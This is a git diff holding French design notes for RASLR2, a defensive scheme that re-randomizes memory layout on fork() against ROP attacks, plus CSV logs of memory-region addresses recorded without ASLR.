Ainsi, leur système va identifier les instructions en assembleur qui vont utiliser des pointeurs (ce qui permet d'utiliser des int en tant que pointeurs par exemple car ils vont être détectés).
|
||||
|
||||
Pour RASLR2, nous allons donner des restrictions sur le code utilisé et interdire l'utilisation de types qui ne pas des pointeurs comme des pointeurs. Ainsi, une simple analyse statique du code en C (avec un parser ?) pour détecter mes variables * (les addresses) seront détéctés. Ainsi, on peut lancer un analysur de code qui va détecter tous les pointeurs à mettre à jour lorsque nous lancerons la randomisation.
|
||||
|
||||
Lors de l'analyse statique, on dectectera aussi les forks. On pourra alors insérer dans le code des instructions en plus avant les forks et après les définitions des pointeurs.
|
||||
Ainsi, lorsqu'une personne compilera avec gcc le programme en mettant en option la librairie que nous avons créée, lorsque le programme tombera sur une instruction de création de poiteur ou de mise à jour de pointeur, nous mettrons à jour la table des pointeurs et lorsqu'un fork se lance, on fait une randomisation à l'aide de la table.
|
||||
|
||||
|
||||
Autre idée ---> Ne pas toucher à la pile et le tas et seulement randomiser le reste (les autres sections). En effet, une attaque ROP va de toute manière utiliser les instructions situées dans le code ou dans les libs donc bouger les autres sections permet de ne pas toucher aux autres. Aussi, pourquoi pas au lieu de faire un ASLR à chaque fork() seulement, aussi le faire tous les n appels de fonctions (par exemple tous les 10 appels à l'instruction `call` en assembleur).
|
||||
|
||||
|
||||
Trucs à faire --->
|
||||
|
||||
- Définir les instructions pour lesquelles le précompilateur va ajouter une instruction
|
||||
- Définir les instructions que l'on va ajouter suite à l'analyse, quand les mettre et ce qu'elle font
|
||||
- Coder le parser et l'analyseur avec l'ajout des instruction, coder la librairie qui va gérer tout ça qui pourra s'interfacer avec gcc (ou alors juste dans le code C ajouter un include vers notre librairie)
|
||||
|
||||
|
||||
|
||||
|
||||
##Definition des instructions en C qui vont être détectées par l'analyseur et pour lesquelles nous allons ajouter des instructions.
|
||||
|
||||
- L'instruction `fork()` sera détectée. Lorsqu'elle sera détectée, nous rajouterons un appel à une fonction qui va randomiser l'espace d'adressages pour le fils. Il fait rajouter cette instuctions seulement lorsque le fils a été créé.
|
||||
|
||||
```C
|
||||
if ((pid = fork()) == 0){
|
||||
//Code du fils
|
||||
libRASLR_randomize();
|
||||
else{
|
||||
//code du père, on fait rien
|
||||
}
|
||||
```
|
||||
- La creation de pointeurs. Il faudra détecter les formes du types `<type> * <nom_var>`. Ainsi, nous rajoutons cette variable dans une table qui recense les pointeurs avec un offset par rapport au bas de la pile (l'origine de la pile). On peut pourquoi pas trouver la base de la pile en parsant au debut de programme le fichier /proc/<pid>/maps. Ainsi, lorsque nous lancerons la randomisation, il suffira à la fin de relancer le parsing de /proc/<pid>/maps.
|
||||
|
||||
- Voir pour parser les appels en assembleur de l'instruction call mais en fait direct voir les apppels de fonctions en C c'est plus simple (forme <nomfonction(*))
|
||||
|
||||
9991
output.csv
Normal file
9991
output.csv
Normal file
File diff suppressed because it is too large
Load diff
9991
outputASLR.csv
Normal file
9991
outputASLR.csv
Normal file
File diff suppressed because it is too large
Load diff
693
outputWithoutASLR.csv
Normal file
693
outputWithoutASLR.csv
Normal file
|
|
@ -0,0 +1,693 @@
|
|||
startCodeAddr,endCodeAddr,startLibAddr,endLibAddr,startStackAddr,endStackAddr
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
